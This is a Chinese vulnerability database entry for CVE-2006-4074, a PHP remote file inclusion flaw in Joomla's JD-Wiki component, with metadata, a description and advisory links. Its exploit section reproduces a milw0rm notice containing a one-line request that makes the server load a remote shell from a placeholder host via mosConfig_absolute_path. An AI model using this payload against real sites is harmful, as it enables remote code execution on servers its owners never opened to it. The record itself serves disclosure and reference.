Joomla软件的JD-组件 'Main.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110765 漏洞类型 代码注入
发布时间 2006-08-07 更新时间 2007-10-01
CVE编号 CVE-2006-4074 CNNVD-ID CNNVD-200608-176
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-176
|漏洞详情
Joomla软件的JD-组件(com_jd-wiki)1.0.2及早期版本的lib/tpl/default/main.php脚本存在PHP远程文件包含漏洞。当register_globals启用时,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating 
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters

# milw0rm.com [2006-08-07]
|参考资料

来源:XF
名称:jdwiki-main-file-include(28253)
链接:http://xforce.iss.net/xforce/xfdb/28253
来源:BID
名称:19373
链接:http://www.securityfocus.com/bid/19373
来源:www.joomladeveloping.org
链接:http://www.joomladeveloping.org/component/option,com_jd-wp/Itemid,29/p,33/
来源:VUPEN
名称:ADV-2006-3192
链接:http://www.frsirt.com/english/advisories/2006/3192
来源:SECUNIA
名称:21389
链接:http://secunia.com/advisories/21389
来源:MILW0RM
名称:2125
链接:http://www.milw0rm.com/exploits/2125
来源:MILW0RM
名称:2125
链接:http://milw0rm.com/exploits/2125